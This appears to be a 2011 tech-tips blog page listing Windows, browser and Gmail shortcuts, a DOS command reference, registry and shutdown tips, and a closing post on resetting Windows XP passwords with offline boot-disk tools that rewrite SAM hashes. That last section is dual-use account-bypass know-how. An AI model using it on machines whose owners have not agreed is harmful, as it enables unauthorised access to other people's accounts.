Ctrl + Shift + Left: Highlight to beginning of previous word.
*

Ctrl + Shift + Right: Highlight to beginning of next word.
*

Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
*

Ctrl + Shift + Down: Highlight to beginning of next paragraph.
*

Home: Move cursor to top of a scrollable control.
*

End: Move cursor to bottom of a scrollable control.


File Browser

*

Arrow Keys: Navigate.
*

Shift + Arrow Keys: Select multiple items.
*

Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.
*

(Letter): Select first found item that begins with (Letter).
*

BackSpace: Go up one level to the parent directory.
*

Alt + Left: Go back one folder.
*

Alt + Right: Go forward one folder.
*

Enter: Activate (Double-click) selected item(s).
*

Alt + Enter: View properties for selected item.
*

F2: Rename selected item(s).
*

Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.
*

Delete: Delete selected item(s).
*

Shift + Delete: Delete selected item(s); bypass Recycle Bin.
*

Ctrl while dragging item(s): Copy.
*

Ctrl + Shift while dragging item(s): Create shortcut(s).
*

In tree pane, if any:
*

Left: Collapse the current selection if expanded, or select the parent folder.
*

Right: Expand the current selection if collapsed, or select the first subfolder.
*

Numpad Asterisk: Expand currently selected directory and all subdirectories. No undo.
*

Numpad Plus: Expand currently selected directory.
*

Numpad Minus: Collapse currently selected directory.


Accessibility

*

Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.
*

Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.
*

Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.
*

NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.
*

Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.
*

6.) Microsoft Natural Keyboard with IntelliType Software Installed
*

Win + L: Log off Windows.
*

Win + P: Open Print Manager.
*

Win + C: Open control panel.
*

Win + V: Open clipboard.
*

Win + K: Open keyboard properties.
*

Win + I: Open mouse properties.
*

Win + A: Open Accessibility properties.
*

Win + Space: Displays the list of Microsoft IntelliType shortcut keys.
*

Win + S: Toggle CapsLock on and off.


Remote Desktop Connection Navigation



*

Ctrl + Alt + End: Open the NT Security dialog.
*

Alt + PageUp: Switch between programs.
*

Alt + PageDown: Switch between programs in reverse.
*

Alt + Insert: Cycle through the programs in most recently used order.
*

Alt + Home: Display start menu.
*

Ctrl + Alt + Break: Switch the client computer between a window and a full screen.
*

Alt + Delete: Display the Windows menu.
*

Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.
*

Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.


Mozilla Firefox Shortcuts

*

Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.
*

Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.
*

Ctrl + (1-9): Switch to tab corresponding to number.
*

Ctrl + N: New window.
*

Ctrl + T: New tab.
*

Ctrl + L or Alt + D or F6: Switch focus to location bar.
*

Ctrl + Enter: Open location in new tab.
*

Shift + Enter: Open location in new window.
*

Ctrl + K or Ctrl + E: Switch focus to search bar.
*

Ctrl + O: Open a local file.
*

Ctrl + W: Close tab, or window if there's only one tab open.
*

Ctrl + Shift + W: Close window.
*

Ctrl + S: Save page as a local file.
*

Ctrl + P: Print page.
*

Ctrl + F or F3: Open find toolbar.
*

Ctrl + G or F3: Find next...
*

Ctrl + Shift + G or Shift + F3: Find previous...
*

Ctrl + B or Ctrl + I: Open Bookmarks sidebar.
*

Ctrl + H: Open History sidebar.
*

Escape: Stop loading page.
*

Ctrl + R or F5: Reload current page.
*

Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.
*

Ctrl + U: View page source.
*

Ctrl + D: Bookmark current page.
*

Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.
*

Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.
*

Ctrl + Numpad0 or Ctrl + 0: Set text size to default.
*

Alt + Left or Backspace: Back.
*

Alt + Right or Shift + Backspace: Forward.
*

Alt + Home: Open home page.
*

Ctrl + M: Open new message in integrated mail client.
*

Ctrl + J: Open Downloads dialog.
*

F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.
*

Shift + F6: Switch to previous frame.
*

Apostrophe ('): Find link as you type.
*

Slash (/): Find text as you type.


Gmail Shortcuts

*

Note: Must have "keyboard shortcuts" on in settings.
*

C: Compose new message.
*

Shift + C: Open new window to compose new message.
*

Slash (/): Switch focus to search box.
*

K: Switch focus to the next most recent email. Enter or "O" opens focused email.
*

J: Switch focus to the next oldest email.
*

N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.
*

P: Switch focus to the previous message.
*

U: Takes you back to the inbox and checks for new mail.
*

Y: Various actions depending on current view:
*

Has no effect in "Sent" and "All Mail" views.
*

Inbox: Archive email or message.
*

Starred: Unstar email or message.
*

Spam: Unmark as spam and move back to "Inbox."
*

Trash: Move back to "Inbox."
*

Any label: Remove the label.
*

X: "Check" an email. Various actions can be performed against all checked emails.
*

S: "Star" an email. Identical to the more familiar term, "flagging."
*

R: Reply to the email.
*

A: Reply to all recipients of the email.
*

F: Forward an email.
*

Shift + R: Reply to the email in a new window.
*

Shift + A: Reply to all recipients of the email in a new window.
*

Shift + F: Forward an email in a new window.
*

Shift + 1 (!): Mark an email as spam and remove it from the inbox.
*

G then I: Switch to "Inbox" view.
*

G then S: Switch to "Starred" view.
*

G then A: Switch to "All Mail" view.
*

G then C: Switch to "Contacts" view.
*

G then S: Switch to "Drafts" view.


List of F1-F9 Key Commands for the Command Prompt



*

F1 / right arrow: Repeats the letters of the last command line, one by one.
*

F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line
*

F3: Repeats the last command line
*

F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line
*

F5: Goes back one command line
*

F6: Enters the traditional CTRL+Z (^z)
*

F7: Displays a menu with the command line history
*

F8: Cycles back through previous command lines (beginning with most recent)
*

F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.
*

Alt+Enter: toggle full Screen mode.
*

up/down: scroll thru/repeat previous entries
*

Esc: delete line
*

Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.

Helpful accessibility keyboard shortcuts

*

Switch FilterKeys on and off. Right SHIFT for eight seconds
*

Switch High Contrast on and off. Left ALT +left SHIFT +PRINT SCREEN
*

Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
*

Switch StickyKeys on and off. SHIFT five times
*

Switch ToggleKeys on and off. NUM LOCK for five seconds
Read More »

A Complete list of DOS Command

DOS Command Index
Information about all current DOS commands

APPEND
(External)

APPEND ;
APPEND [d:]path[;][d:]path[...]
APPEND [/X:on|off][/path:on|off] [/E]

Displays or sets the search path for data files. DOS will search the specified path(s) if the file is not found in the current path.


ASSIGN
(External)

ASSIGN x=y [...] /sta

Redirects disk drive requests to a different drive.


ATTRIB
(External)

ATTRIB [d:][path]filename [/S]
ATTRIB [+R|-R] [+A|-A] [+S|-S] [+H|-H] [d:][path]filename [/S]

Sets or displays the read-only, archive, system, and hidden attributes of a file or directory.


BACKUP
(External)

BACKUP d:[path][filename] d:[/S][/M][/A][/F:(size)] [/P][/D:date] [/T:time] [/L:[path]filename]

Makes a backup copy of one or more files. (In DOS Version 6, this program is stored on the DOS supplemental disk.)


BREAK
(Internal)

BREAK =on|off

Used from the DOS prompt or in a batch file or in the CONFIG.SYS file to set (or display) whether or not DOS should check for a Ctrl + Break key combination.


BUFFERS
(Internal)

BUFFERS=(number),(read-ahead number)

Used in the CONFIG.SYS file to set the number of disk buffers (number) that will be available for use during data input. Also used to set a value for the number of sectors to be read in advance (read-ahead) during data input operations.


CALL
(Internal)

CALL [d:][path]batchfilename [options]

Calls another batch file and then returns to current batch file to continue.


CHCP
(Internal)

CHCP (codepage)

Displays the current code page or changes the code page that DOS will use.


CHDIR
(Internal)

CHDIR (CD) [d:]path
CHDIR (CD)[..]

Displays working (current) directory and/or changes to a different directory.


CHKDSK
(External)

CHKDSK [d:][path][filename] [/F][/V]

Checks a disk and provides a file and memory status report.


CHOICE
(Internal)

CHOICE [/C[:]keys] [/N][/S][/T[:]c,nn] [text]

Used to provide a prompt so that a user can make a choice while a batch program is running.


CLS (Clear Screen)
(Internal)

CLS

Clears (erases) the screen.


COMMAND
(External)

COMMAND [d:][path] [device] [/P][/E:(size)] [/MSG][/Y [/C (command)|/K (command)]

Starts a new version of the DOS command processor (the program that loads the DOS Internal programs).


COMP
(External)

COMP [d:][path][filename] [d:][path][filename] [/A][/C][/D][/L][/N:(number)]

Compares two groups of files to find information that does not match. (See FC command).


COPY
(Internal)

COPY [/Y|-Y] [/A][/B] [d:][path]filename [/A][/B] [d:][path][filename] [/V]
or
COPY [/Y|-Y][/A][/B] [d:][path]filename+[d:][path]filename[...][d:][path][filename] [/V]

Copies and appends files.


COUNTRY
(Internal)

COUNTRY=country code,[code page][,][d:][filename]

Used in the CONFIG.SYS file to tell DOS to use country-specific text conventions during processing.


CTTY
(Internal)

CTTY (device)

Changes the standard I/O (Input/Output) device to an auxiliary device.


DATE
(Internal)

DATE mm-dd-yy

Displays and/or sets the system date.


DBLSPACE
(External)

DBLSPACE / automount=drives
DBLSPACE /chkdsk [/F] [d:]
DBLSPACE /compress d: [/newdrive=host:] [/reserve=size] [/F]
DBLSPACE /create d: [/newdrive=host:] [/reserve=size] [/size=size]
DBLSPACE /defragment [d:] ]/F]
DBLSPACE /delete d:
DBLSPACE /doubleguard=0|1
DBLSPACE /format d:
DBLSPACE [/info] [d:]
DBLSPACE /list
DBLSPACE /mount[=nnn] host: [/newdrive=d:]
DBLSPACE /ratio[=ratio] [d:] [/all]
DBLSPACE /size[=size] [/reserve=size] d:
DBLSPACE /uncompress d:
DBLSPACE /unmount [d:]

A program available with DOS 6.0 that allows you to compress information on a disk.


DEBUG
(External)

DEBUG [pathname] [parameters]

An MS-DOS utility used to test and edit programs.


DEFRAG
(External)

DEFRAG [d:] [/F][/S[:]order] [/B][/skiphigh [/LCD|/BW|/GO] [/H]
DEFRAG [d:] [/V][/B][/skiphigh] [/LCD]|/BW|/GO] [/H]

Optimizes disk performance by reorganizing the files on the disk.


DEL (ERASE)
(Internal)

DEL (ERASE) [d:][path]filename [/P]

Deletes (erases) files from disk.


DELOLDOS
(External)

DELOLDOS [/B]

Deletes all files from previous versions of DOS after a 5.0 or 6.0 installation.


DELTREE
(External)

DELTREE [/Y] [d:]path [d:]path[...]

Deletes (erases) a directory including all files and subdirectories that are in it.


DEVICE
(Internal)

DEVICE=(driver name)

Used in the CONFIG.SYS file to tell DOS which device driver to load.


DEVICEHIGH
(Internal)

DEVICEHIGH=(driver name)

Like DEVICE, DEVICEHIGH is used in the CONFIG.SYS file to tell DOS which device driver software to use for devices; however, this option is used to install the device driver into the upper memory area.


DIR
(Internal)

DIR [d:][path][filename] [/A:(attributes)] [/O:(order)] [/B][/C][/CH][/L][/S][/P][/W]

Displays directory of files and directories stored on disk.


DISKCOMP
(External)

DISKCOMP [d:] [d:][/1][/8]

Compares the contents of two diskettes.


DISKCOPY
(External)

DISKCOPY [d:] [d:][/1][/V][/M]

Makes an exact copy of a diskette.


DOS
(Internal)

DOS=[high|low],[umb|noumb]

Used in the CONFIG.SYS file to specify the memory location for DOS. It is used to load DOS into the upper memory area and to specify whether or not the upper memory blocks will be used.


DOSKEY
(External)

DOSKEY [reinstall] [/bufsize=size][/macros][/history][/insert|/overstrike] [macroname=[text]]

Loads the Doskey program into memory which can be used to recall DOS commands so that you can edit them.


DOSSHELL
(External)

DOSSHELL [/B] [/G:[resolution][n]]|[/T:[resolution][n]]

Initiates the graphic shell program using the specified screen resolution.


DRIVPARM
(Internal)

DRIVPARM= /D:(number) [/C] [/F:(form factor)] [/H:(number)] [/I][ /N][/S:(number)] [/T:(tracks)]

Used in the CONFIG.SYS file to set parameters for a disk drive.


ECHO
(Internal)

ECHO on|off
ECHO (message)

Displays messages or turns on or off the display of commands in a batch file.


EDIT
(External)

EDIT [d:][path]filename [/B][/G][/H][/NOHI]

Starts the MS-DOS editor, a text editor used to create and edit ASCII text files.


EMM386
(External)

EMM386 [on|off|auto] [w=on|off]

Enables or disables EMM386 expanded-memory support on a computer with an 80386 or higher processor.


EXE2BIN
(External)

EXE2BIN [d:][path]filename [d:][path]filename

Converts .EXE (executable) files to binary format.


EXIT
(Internal)

EXIT

Exits a secondary command processor.


EXPAND
(External)

EXPAND [d:][path]filename [[d:][path]filename[ . . .]]

Expands a compressed file.


FASTHELP
(External)

FASTHELP [command][command] /?

Displays a list of DOS commands with a brief explanation of each.


FASTOPEN
(External)

FASTOPEN d:[=n][/X]

Keeps track of the locations of files for fast access.


FC
(External)

FC [/A][/C][/L][/Lb n][/N][/T][/W][number] [d:][path]filename [d:][path]filename

or (for binary comparisons)
FC [/B][/number] [d:][path]filename [d:][path]filename

Displays the differences between two files or sets of files.


FCBS
(Internal)

FCBS=(number)

Used in the CONFIG.SYS file to specify the number of file-control blocks for file sharing.


FDISK
(External)

FDISK [/status]

Prepares a fixed disk to accept DOS files for storage.


FILES
(Internal)

FILES=(number)

Used in the CONFIG.Sys file to specify the maximum number of files that can be open at the same time.


FIND
(External)

FIND [/V][/C][/I][/N] ÒstringÓ [d:][path]filename[...]

Finds and reports the location of a specific string of text characters in one or more files.


FOR
(Internal)

FOR %%(variable) IN (set) DO (command)

or (for interactive processing)
FOR %(variable) IN (set) DO (command)

Performs repeated execution of commands (for both batch processing and interactive processing).


FORMAT
(External)

FORMAT d:[/1][/4][/8][/F:(size)] [/N:(sectors)] [/T:(tracks)][/B|/S][/C][/V:(label)] [/Q][/U][/V]

Formats a disk to accept DOS files.


GOTO
(Internal)

GOTO (label)

Causes unconditional branch to the specified label.


GRAFTABL
(External)

GRAFTABL [(code page)]
GRAFTABL [status]

Loads a table of character data into memory (for use with a color/graphics adapter).


GRAPHICS
(External)

GRAPHICS [printer type][profile] [/B][/R][/LCD][/PB:(id)] [/C][/F][/P(port)]

Provides a way to print contents of a graphics screen display.


HELP
(External)

HELP [command] [/B][/G][/H][/NOHI]

Displays information about a DOS command.


IF
(Internal)

IF [NOT] EXIST filename (command) [parameters]
IF [NOT] (string1)==(string2) (command) [parameters]
IF [NOT] ERRORLEVEL (number) (command) [parameters]

Allows for conditional operations in batch processing.


INCLUDE
(Internal)

INCLUDE= blockname

Used in the CONFIG.SYS file to allow you to use the commands from one CONFIG.SYS block within another.


INSTALL
(Internal)

INSTALL=[d: ][\path]filename [parameters]

Used in the CONFIG.SYS file to load memory-resident programs into conventional memory.


INTERLINK
(External)

INTERLINK [client[:]=[server][:]]

Connects two computers via parallel or serial ports so that the computers can share disks and printer ports.


INTERSVR
(External)

INTERSVR [d:][...][/X=d:][...] [/LPT:[n|address]] [/COM:[n|address]][/baud:rate] [/B][/V]
INTERSVR /RCOPY

Starts the Interlink server.


JOIN
(External)

JOIN d: [d:path]
JOIN d: [/D]

Allows access to the directory structure and files of a drive through a directory on a different drive.


KEYB
(External)

KEYB [xx][,][yyy][,][d:][path]filename [/E][/ID:(number)]

Loads a program that replaces the support program for U. S. keyboards.

LABEL
(External)

LABEL [d:][volume label]

Creates or changes or deletes a volume label for a disk.

LASTDRIVE
(Internal)

LASTDRIVE=(drive letter)

Used in the CONFIG.SYS file to set the maximum number of drives that can be accessed.

LOADFIX
(Internal)

LOADFIX [d:][path]filename [parameters]

Ensures that a program is loaded above the first 64K of conventional memory, and runs the program.

LOADHIGH
(Internal)

LOADHIGH (LH) [d:][path]filename [parameters]

Loads memory resident application into reserved area of memory (between 640K-1M).


MEM
(External)

MEM [/program|/debug|/classify|/free|/module(name)] [/page]

Displays amount of installed and available memory, including extended, expanded, and upper memory.


MEMMAKER
(External)

MEMMAKER [/B][/batch][/session][/swap:d] [/T][/undo][/W:size1,size2]

Starts the MemMaker program, a program that lets you optimize your computer's memory.


MENUCOLOR
(Internal)

MENUCOLOR=textcolor,[background]

Used in the CONFIG.SYS file to set the colors that will be used by DOS to display text on the screen.


MENUDEFAULT
(Internal)

MENUDEFAULT=blockname, [timeout]

Used in the CONFIG.SYS file to set the startup configuration that will be used by DOS if no key is pressed within the specified timeout period.


MENUITEM
(Internal)

MENUITEM=blockname, [menutext]

Used in the CONFIG.SYS file to create a start-up menu from which you can select a group of CONFIG.SYS commands to be processed upon reboot.


MIRROR
(External)

MIRROR [d:]path [d:] path [...]
MIRROR [d1:][d2:][...] [/T(drive)(files)] [/partn][/U][/1]

Saves disk storage information that can be used to recover accidentally erased files.


MKDIR
(MD) (Internal)

MKDIR (MD) [d:]path

Creates a new subdirectory.



MODE
(External)

MODE n
MODE LPT#[:][n][,][m][,][P][retry]
MODE [n],m[,T]
MODE (displaytype,linetotal)
MODE COMn[:]baud[,][parity][,][databits][,][stopbits][,][retry]
MODE LPT#[:]=COMn [retry]
MODE CON[RATE=(number)][DELAY=(number)]
MODE (device) CODEPAGE PREPARE=(codepage) [d:][path]filename
MODE (device) CODEPAGE PREPARE=(codepage list) [d:][path]filename
MODE (device) CODEPAGE SELECT=(codepage)
MODE (device) CODEPAGE [/STATUS]
MODE (device) CODEPAGE REFRESH

Sets mode of operation for devices or communications.


MORE
(External)

MORE < (filename or command) (name)|MORE Sends output to console, one screen at a time. MOVE (Internal) MOVE [/Y|/-Y] [d:][path]filename[,[d:][path]filename[...]] destination Moves one or more files to the location you specify. Can also be used to rename directories. MSAV (External) MSAV [d:] [/S|/C][/R][/A][/L][/N][/P][/F][/video][/mouse] MSAV /video Scans your computer for known viruses. MSBACKUP (External) MSBACKUP [setupfile] [/BW|/LCD|/MDA] Used to backup or restore one or more files from one disk to another. MSCDEX (External) MSCDEX /D:driver [/D:driver2. . .] [/E][/K][/S][/V][/L:letter] [/M:number] Used to gain access to CD-ROM drives (new with DOS Version 6). MSD (External) MSD [/B][/I] MSD [/I] [/F[d:][path]filename [/P[d:][path]filename [/S[d:][path]filename Provides detailed technical information about your computer. NLSFUNC (External) NLSFUNC [d:][path]filename Used to load a file with country-specific information. NUMLOCK (Internal) NUMLOCK=on|off Used in the CONFIG.SYS file to specify the state of the NumLock key. PATH (Internal) PATH; PATH [d:]path[;][d:]path[...] Sets or displays directories that will be searched for programs not in the current directory. PAUSE (Internal) PAUSE [comment] Suspends execution of a batch file until a key is pressed. POWER (External) POWER [adv:max|reg|min]|std|off] Used to turn power management on and off, report the status of power management, and set levels of power conservation. PRINT (External) PRINT [/B:(buffersize)] [/D:(device)] [/M:(maxtick)] [/Q:(value] [/S:(timeslice)][/U:(busytick)] [/C][/P][/T] [d:][path][filename] [...] Queues and prints data files. PROMPT (Internal) PROMPT [prompt text] [options] Changes the DOS command prompt. RECOVER (External) RECOVER [d:][path]filename RECOVER d: Resolves sector problems on a file or a disk. (Beginning with DOS Version 6, RECOVER is no longer available ). REM (Internal) REM [comment] Used in batch files and in the CONFIG.SYS file to insert remarks (that will not be acted on). RENAME (REN) (Internal) RENAME (REN) [d:][path]filename [d:][path]filename Changes the filename under which a file is stored. REPLACE (External) REPLACE [d:][path]filename [d:][path] [/A][/P][/R][/S][/U][/W] Replaces stored files with files of the same name from a different storage location. RESTORE (External) RESTORE d: [d:][path]filename [/P][/S][/B:mm-dd-yy] [/A:mm-dd-yy][/E:hh:mm:ss] [/L:hh:mm:ss] [/M][/N][/D] Restores to standard disk storage format files previously stored using the BACKUP command. RMDIR (RD) (Internal) RMDIR (RD) [d:]path Removes a subdirectory. SCANDISK (External) SCANDISK [d: [d: . . .]|/all][/checkonly|/autofix[/nosave]|/custom][/surface][/mono][/nosummay] SCANDISK volume-name[/checkonly|/autofix[/nosave]|/custom][/mono][/nosummary] SCANDISK /fragment [d:][path]filename SCANDISK /undo [undo-d:][/mono] Starts the Microsoft ScanDisk program which is a disk analysis and repair tool used to check a drive for errors and correct any problems that it finds. SELECT (External) SELECT [d:] [d:][path] [country code][keyboard code] Formats a disk and installs country-specific information and keyboard codes (starting with DOS Version 6, this command is no longer available). SET (Internal) SET (string1)=(string2) Inserts strings into the command environment. The set values can be used later by programs. SETVER (External) SETVER [d:]:path][filename (number)][/delete][/quiet] Displays the version table and sets the version of DOS that is reported to programs. SHARE (External) SHARE [/F:space] [/L:locks] Installs support for file sharing and file locking. SHELL (Internal) SHELL=[d:][path]filename [parameters] Used in the CONFIG.SYS file to specify the command interpreter that DOS should use. SHIFT (Internal) SHIFT Increases number of replaceable parameters to more than the standard ten for use in batch files. SORT (External) SORT [/R][/+n] < (filename) SORT [/R][/+n] > (filename2)

Sorts input and sends it to the screen or to a file.



STACKS
(Internal)

STACKS=(number),(size)

Used in the CONFIG.SYS file to set the number of stack frames and the size of each stack frame.



SUBMENU
(Internal)

SUBMENU=blockname, [menutext]

Used in the CONFIG.SYS file to create a multilevel menu from which you can select start-up options.



SUBST
(External)

SUBST d: d:path
SUBST d: /D

Substitutes a virtual drive letter for a path designation.



SWITCHES
(Internal)

SWITCHES= [/K][/F][/N][/W]

Used in the CONFIG.SYS file to configure DOS in a special way; for example, to tell DOS to emulate different hardware configurations.



SYS
(External)

SYS [source] d:

Transfers the operating system files to another disk.



TIME
(Internal)

TIME hh:mm[:ss][.cc][A|P]

Displays current time setting of system clock and provides a way for you to reset the time.



TREE
(External)

TREE [d:][path] [/A][/F]

Displays directory paths and (optionally) files in each subdirectory.



TYPE
(Internal)

TYPE [d:][path]filename

Displays the contents of a file.



UNDELETE
(External)

UNDELETE [d:][path][filename] [/DT|/DS|/DOS]
UNDELETE [/list|/all|/purge[d:]|/status|/load|/U|/S[d:]|/Td:[-entries]]

Restores files deleted with the DELETE command.



UNFORMAT
(External)

UNFORMAT d: [/J][/L][/test][/partn][/P][/U]

Used to undo the effects of formatting a disk.



VER
(Internal)

VER

Displays the DOS version number.



VERIFY
(Internal)

VERIFY on|off

Turns on the verify mode; the program checks all copying operations to assure that files are copied correctly.



VOL
(Internal)

VOL [d:]

Displays a disk's volume label.



VSAFE
(External)

VSAFE [/option[+|-]...] [/NE][/NX][Ax|/Cx] [/N][/D][/U]

VSAFE is a memory-resident program that continuously monitors your computer for viruses and displays a warning when it finds one.



XCOPY
(External)

XCOPY [d:][path]filename [d:][path][filename] [/A][/D:(date)] [/E][/M][/P][/S][/V][/W][Y\-Y]
Copies directories, subdirectories, and files.



Syntax Notes

To be functional, each DOS command must be entered in a particular way: this command entry structure is known as the command's "syntax." The syntax "notation" is a way to reproduce the command syntax in print.

For example, you can determine the items that are optional, by looking for information that is printed inside square brackets. The notation [d:], for example, indicates an optional drive designation. The command syntax, on the other hand, is how YOU enter the command to make it work.


Command Syntax Elements
1. Command Name

The DOS command name is the name you enter to start the DOS program (a few of the DOS commands can be entered using shortcut names). The DOS command name is always entered first. In this book, the command is usually printed in uppercase letters, but you can enter command names as either lowercase or uppercase or a mix of both.

2. Space

Always leave a space after the command name.

3. Drive Designation

The drive designation (abbreviated in this book as "d:") is an option for many DOS commands. However, some commands are not related to disk drives and therefore do not require a drive designation. Whenever you enter a DOS command that deals with disk drives and you are already working in the drive in question, you do not have to enter the drive designator. For example, if you are working in drive A (when the DOS prompt A> is showing at the left side of the screen) and you want to use the DIR command to display a directory listing of that same drive, you do not have to enter the drive designation. If you do not enter a drive designation, DOS always assumes you are referring to the drive you are currently working in (sometimes called the "default" drive).

4. A Colon

When referring to a drive in a DOS command, you must always follow the drive designator with a colon (:) (this is how DOS recognizes it as a drive designation).

5. Pathname

A pathname (path) refers to the path you want DOS to follow in order to act on the DOS command. As described in Chapter 3, it indicates the path from the current directory or subdirectory to the files that are to be acted upon.

6. Filename

A filename is the name of a file stored on disk. As described in Chapter 1, a filename can be of eight or fewer letters or other legal characters.

7. Filename Extension

A filename extension can follow the filename to further identify it. The extension follows a period and can be of three or fewer characters. A filename extension is not required.

8. Switches

Characters shown in a command syntax that are represented by a letter or number and preceded by a forward slash (for example, "/P") are command options (sometimes known as "switches"). Use of these options activate special operations as part of a DOS command's functions.

9. Brackets

Items enclosed in square brackets are optional; in other words, the command will work in its basic form without entering the information contained inside the brackets.

10. Ellipses

Ellipses (...) indicate that an item in a command syntax can be repeated as many times as needed.

11. Vertical Bar

When items are separated by a vertical bar (|), it means that you enter one of the separated items. For example: ON | OFF means that you can enter either ON or OFF, but not both
Read More »

Thursday 16 June 2011

Delete or Remove Recycle bin Icon from Desktop

hack the worlds
If you are the kind of person who always likes neatness specially desktop, then here is a small trick for you that will simply remove the Recycle bin icon from desktop.



Follow the steps below:

[Start] [Run] [Regedit]
Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\

CurrentVersion\Explorer\BitBucket


Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.


Data Type: DWORD // Value Name: NukeOnDelete


Setting for Value Data: [0 = Use Recycle Bin / 1 = Permanently Delete]
Exit Registry and Reboot


Another Method
start->run->gpedit.msc-> user configuration ->desktop->remove recycle bin from desktop->double click->change it not configured to enable->apply and ok.

now come to start->run->gpupdate.exe and press enter.

your recycle bin icon is gone from desktop nad you will need to revert your settings for get that back.

after reverting setting make sure to run gpupdate.exe command.
Read More »

Shutdown for Windows OS

Did you know that in Windows XP you can shut down your computer from the (eventually DOS prompt) command line box? Moreover, you can do this by clicking your mouse only once.

All you need to do is... right-click on an empty Desktop spot -> select New -> Shortcut -> type shutdown followed by a space, and then enter one or more of the parameters listed below -> click Next -> type a suggestive name for your new shortcut -> finally, click Finish.

This is the Shutdown.exe (located in %systemroot%\System32, usually C:\Windows\System32) syntax:

shutdown [-i|-l|-s|-r|-a] [-f] [-m \\computername] [-t xx] [-c "Text"] [-d[u][p]:xx:yy]>

Valid command line switches:

-a = Abort system shutdown in progress ONLY IF the -t xx timeout option was already set to ANY value other than 0. ALL switches except -l and -m are ignored during abort.

-c "Text" = Text comment (case insensitive) to be displayed in the Message area of the System Shutdown window. MUST be enclosed between quotes. Maximum allowed 127 ASCII characters.

-d [u][p]:xx:yy = Reason code for shutdown:
u = User code.
p = Planned shutdown code.
xx = Major reason code. Positive integer number less than 256.
yy = Minor reason code. Positive integer number less than 65536.

-f = Force running applications to close without warning.

-i = Display the shutdown interface (GUI). MUST be the first option!

-l = Log off the current user of the local computer (default action). Can NOT be used with the -m option unless the current user has Sysadmin rights, in which case the -m switch takes precedence.
-m \\computername = Remote/network computer name (most always case sensitive) to log off/restart/shut down. Current user MUST have Sysadmin rights to be allowed to use this switch!

-s = Shut down the local computer.

-r = Shut down and restart (reboot) the local computer.

-t xx = Set shutdown timer to timeout for xx seconds. IF NOT specified defaults to 20 seconds. Allowed values between 0 and 99 seconds. The -a switch is the ONLY one that CAN be used during the timeout period.

NOTE:
The dash (-) in front of these switches can be replaced by a forward slash (/).

Spaces are NOT required to separate the shutdown command from ANY following switches, but ARE required to separate ANY switch from its following parameter(s), if any.
For example:

shutdown -s -c "Shutting down!" -t 3

tells your computer to shutdown after waiting for 3 seconds while the System Shutdown window will display text above in the Message area.

Optional: after you're done creating your customized shortcut for shutdown -> right-click on it -> select Properties -> enter your desired key "combo" in the Shortcut Key box (e.g. Ctrl + Alt + End) -> click OK/Apply.
From now on just left-click on your shutdown shortcut or hit that key combination to turn off/restart/log off your computer.
Read More »

Sunday 12 June 2011

Reset an XP Password

Reset an XP Password

Option #1

ERD – Emergency recovery disk. Using this method you need to prepare ahead, by downloading one of FREE ERD tools and burning it onto CD.

ERDs are Free Windows password-cracking tools are usually Linux boot disks that have NT file system (NTFS) drivers and software that will read the registry and rewrite the password hashes for any account including the Administrators. This process requires physical access to the console but it works like a charm! I've done it myself several times with no glitch or problem whatsoever.

Caution: If used on users that have EFS encrypted files, and the system is XP or later service packs on W2K, all encrypted files for that user will be UNREADABLE! And cannot be recovered unless you remember the old password again!

Pros: Quick, Works in 99% of cases.

Cons: Might seem complicated for notice user, doesn’t work with certain SATA disk and/or Raid controllers

Here are my favorite tools:

Petter Nordahl-Hagen's Offline NT Password & Registry Editor - A great boot CD/Floppy that can reset the local administrator's password. (The only tool for Windows VISTA)

EBCD – Emergency Boot CD - Bootable CD, intended for system recovery in the case of software or hardware faults.

Offline NT Password & Registry Editor (v060213 - February 2006)
Petter Nordahl-Hagen has written a Windows NT/2000/XP/Vista offline password editor:

http://home.eunet.no/~pnordahl/ntpasswd

· This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2000/XP/2003/Vista system, by modifying the encrypted password in the registry's SAM file.

· You do not need to know the old password to set a new one.

· It works offline, that is, you have to shutdown your computer and boot off a floppy disk or CD. The boot-disk includes stuff to access NTFS partitions and scripts to glue the whole thing together.

· Works with syskey (no need to turn it off, but you can if you have lost the key)

· Will detect and offer to unlock locked or disabled out user accounts!

Download links:

· cd060213.zip (~3MB) - Bootable CD image with newer drivers

· bd050303.zip (~1.1MB) - Bootdisk image, date 050303.

· sc050303.zip(~1.4MB) - SCSI-drivers (050303) (only use newest drivers with newest bootdisk, this one works with bd050303)

To write these images to a floppy disk you'll need RawWrite2 which is included in the Bootdisk image download. To create the CD you just need to use your favorite CD burning program and burn the .ISO file to CD. I personally prefer CD option since I don’t have to fiddle around with antique technology like floppy drives, besides most of new pc don’t have floppy drive at all.

Support and Problems? Good FAQ set up covering most of the day-to-day questions. Read it right HERE

Author claims that this tool was successfully tested on NT 3.51, NT 4, Windows 2000 (except datacenter), Windows XP (all versions) and Window Server 2003. Notice that it is NOT compatible with Active Directory. To work around this limitations please read the Forgot the Administrator's Password? - Reset Domain Admin Password in Windows Server 2003 AD page.

EBCD – Emergency Boot CD (v0.61 - October 2004)
